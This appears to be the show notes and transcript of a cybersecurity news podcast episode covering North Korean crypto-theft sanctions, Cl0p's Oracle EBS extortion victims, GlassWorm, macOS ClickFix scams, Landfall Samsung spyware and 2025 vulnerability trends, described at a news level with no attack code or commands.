Zero-Day Spies, North Korean Crypto Heists, and Cl0p's Corporate Hit List

Show Notes

Australia steps up sanctions against North Korean cyber operations funding weapons programs, while the Cl0p gang continues to expose victims of the Oracle EBS hack. Plus, we break down the evolving threat landscape from sophisticated ClickFix scams targeting macOS to mobile zero-day spyware aimed at the Middle East.

 

Transcript

Welcome back to Cyber Scoops & Digital Shenanigans, the podcast where we unpack the week's biggest digital disasters and triumphs. I'm your host, Mike Housch, and we have a packed show today covering everything from nation-state funding to zero-day iPhone exploits. Let's dive right in!

We start this week with a major move by the Australian government, stepping up their pressure campaign against North Korea’s illicit financial networks. They’ve announced sanctions against four entities and one individual believed to be deeply involved in cybercriminal activities that are directly funding North Korea’s weapons programs.

Australia is essentially mirroring recent actions taken by the US, targeting bankers, financial institutions, and others involved in laundering money derived from North Korean cyber operations. We’re talking about activities like cryptocurrency theft, fraudulent IT worker schemes, and espionage. This isn't small potatoes; blockchain analysis firm Elliptic estimated earlier in October that North Korean hackers have already stolen over $2 billion in cryptocurrency during the first nine months of 2025 alone.

These new financial sanctions include travel bans and are aimed at disrupting Pyongyang’s network, which the US Treasury Department says launders funds through banking representatives, financial institutions, and shell companies primarily located in North Korea, China, and Russia. Just last week, the Treasury’s ofac office added several North Korean nationals to its sanctioned list, including Choe Chun Pom and Ri Jin Hyok. They also listed organizations like the Korea Mangyongdae Computer Technology Corporation and Ryujong Credit Bank, along with 53 cryptocurrency addresses linked to these criminal and espionage activities. Foreign Minister Penny Wong emphasized that Australia will keep working with international partners to respond to this malicious cyber activity.

Transitioning now from state-sponsored theft to pure profit-driven enterprise crime, let's talk about the Cl0p ransomware group, sometimes linked to the FIN11 threat actor. They have continued to reveal alleged victims from their massive campaign targeting customers of Oracle’s E-Business Suite, or EBS.

The Cl0p leak website now lists nearly 30 organizations allegedly hit by this hack. When the extortion emails first went out in late September, it hit executives at dozens of organizations. Now we know some of the high-profile names confirming impacts, including Harvard University, Envoy Air—a subsidiary of American Airlines—and The Washington Post.

A new name on that list, and one that is quite significant, is Allianz UK. The insurance giant’s UK arm confirmed it was compromised via its Oracle EBS implementation, specifically affecting its personal lines business covering products like home, car, and travel insurance. The attack compromised the data of 80 current and 670 previous Allianz UK customers. Interestingly, Allianz UK’s spokesperson noted that the criminals had initially misattributed the victim, claiming they hit subsidiary Liverpool Victoria (LV).

What makes this so concerning is the sheer scope, Mike. The alleged victims span various critical sectors: mining, professional services, manufacturing, financial, transportation, and more, with industrial giants like Schneider Electric and Logitech reportedly on the list. In some cases, Cl0p has leaked hundreds of gigabytes, even terabytes, of stolen data. We’re seeing strong evidence that the attackers exploited zero-day vulnerabilities in Oracle EBS, possibly CVE-2025-61882. Google Threat Intelligence noted that attacks exploiting this severe vulnerability, rated 9.8, could have started as early as July, months before the patches were even public.

Next up, let's talk about threats targeting software developers, specifically the resurgence of GlassWorm malware. Just weeks after being removed from the Visual Studio (VS) Code extensions marketplace, it’s back in the Open VSX registry. Koi Security reports that three more infected VS Code extensions were found, bringing in about 10,000 new downloads.

GlassWorm is designed to steal NPM, GitHub, and Git credentials, alongside funds from 49 cryptocurrency extensions. It’s highly stealthy, utilizing Unicode variation selectors to hide its code in editors and using the Solana blockchain for its command-and-control infrastructure. What’s alarming is that similar malicious code has now popped up on GitHub repositories, suggesting the same Russian-speaking threat actor is likely behind both campaigns. Researchers from Aikido Security believe attackers are blending malicious code with realistic commits, possibly aided by AI, making their changes look natural.

And speaking of evolving tactics, we need to address ClickFix attacks, which are becoming increasingly tailored for macOS users. ClickFix is a social engineering tactic where a fake error message prompts a victim to click a ‘fix’ button. When they click, a malicious command is copied silently to their clipboard.

Previously, many ClickFix prompts directed to Mac users still contained instructions meant for Windows. But now? They’ve evolved significantly. Push Security found what they call the “most advanced ClickFix” to date. This pop-up mimics a Cloudflare verification page, is well-designed, and the instructions are specifically tailored for macOS. Crucially, the malicious command is apparently copied automatically to the user’s clipboard, requiring fewer manual steps. To increase pressure, the page displays a countdown timer and even includes an embedded video showing the victim exactly how to execute the fake verification steps. Remember, user training and awareness remain absolutely critical against these types of attacks, as security systems often struggle when the user manually executes the command.

Shifting gears to mobile threats: we’re seeing new spyware called Landfall that specifically targets Samsung device owners. Palo Alto Networks reported that Landfall exploited a zero-day vulnerability, CVE-2025-21042, in a Samsung image processing library. This zero-day allows for remote code execution.

The attackers delivered Landfall by sending a specially crafted DNG image through WhatsApp. This likely acted as a zero-click exploit, and targeted devices included Samsung Galaxy S22, S23, S24, Z Fold4, and Z Flip4 phones. Once infected, the spyware is highly intrusive, offering microphone recording, location tracking, and the ability to steal photos, contacts, and call logs. Analysis suggests these zero-day attacks were aimed primarily at individuals in the Middle East and North Africa, including Iran, Iraq, Turkey, and Morocco.

Finally, let’s wrap up with a quick look at the exposure management landscape. A new report from Intruder highlights that 2025 has brought significant pressure points. We are seeing a major surge: high-severity vulnerabilities are up nearly 20 percent.

Why the surge? Attackers are using AI-assisted exploit development, which is making it faster than ever to weaponize high-severity flaws and turn them into working attacks. The good news is that defenders are responding faster to the most critical issues. In 2025, 89 percent of resolved critical vulnerabilities were fixed within 30 days, a sharp improvement from 75 percent last year. This acceleration is likely due to major breaches pushing cybersecurity higher on boardroom agendas.

And quickly, a shout-out to the vendors doing their part. qnap rolled out patches for two dozen vulnerabilities, including seven flaws that were successfully exploited during the Pwn2Own Ireland 2025 hacking competition. These included critical code injection flaws in Malware Remover and hardcoded credential issues in Hyper Data Protector. If you run qnap devices, patch immediately, as their vulnerabilities are popular targets for threat actors.

That’s all the time we have for this week’s edition of Cyber Scoops & Digital Shenanigans. Stay safe out there, patch your systems, and we’ll catch you next time!